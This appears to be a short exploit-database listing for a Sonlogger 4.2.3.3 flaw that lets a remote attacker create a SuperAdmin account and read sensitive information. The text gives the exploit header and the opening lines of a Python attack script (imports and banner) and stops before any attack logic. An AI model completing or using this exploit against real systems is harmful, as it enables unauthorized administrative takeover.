Exploits / Vulnerability Discovered : 2021-03-15 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Sonlogger 4.2.3.3 superadmin account creation / information disclosure is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
# Date: 04-02-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.sonlogger.com/
# Version: 4.2.3.3
# Tested on: Windows 10 Enterprise x64 Version 1803
# A remote attacker can be create an user with SuperAdmin profile
#!/usr/bin/python3
import argparse
import string
import sys
from random import random
import requests
import json
banner = '''
Sonlogger Log and Report System - v4.2.3.3
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure